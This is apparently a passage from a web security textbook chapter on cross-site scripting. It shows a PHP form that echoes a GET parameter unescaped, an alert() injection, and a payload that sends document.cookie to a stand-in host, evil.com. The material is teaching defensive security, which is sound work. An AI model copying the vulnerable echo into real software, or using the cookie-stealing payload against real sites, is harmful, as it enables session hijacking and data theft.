CHAPTER 5 – Cross-Site Scripting

By using the cross-site scripting technique, an attacker might be able to execute pieces of client-side scripting lan- guages, such as JavaScript, and steal cookies or other sensitive data. Cross- site scripting is really not hard. The attacker only needs a way to insert raw data into the HTML of the site. For example, the attacker might enter <script language="JavaScript">alert();</script> into an input box that does not strip any HTML tags. The following script illustrates this possibility: <html> <head><title>XSS example</title></head> <body> <form> <input name='foo' value='<?php echo $_GET['foo']; ?>'> </form> </html> It's a straightforward script. Suppose the attacker types the following into your form field: '><script language='JavaScript'>alert('boo!');</script><a b=' The JavaScript code results in the pop-up shown in Figure 5.2. Fig. 5.2 Effects of JavaScript in unchecked input. Of course, this is not scary. However, suppose instead of this innocent pop- up, the following is input: '><script language='JavaScript'>document.location= 'http://evil.com/cgi-bin/cookie.cgi?f='+document.cookie</script><a b=' When a user is tricked into activating this URL, the contents of your cookie are sent to the evil.com guys. Of course, a user is not likely to click a URL with evil.com in it, but the bad guys can change the "evil.com" to an URL-encoded form that would look less "weird," especially to beginning Internet users.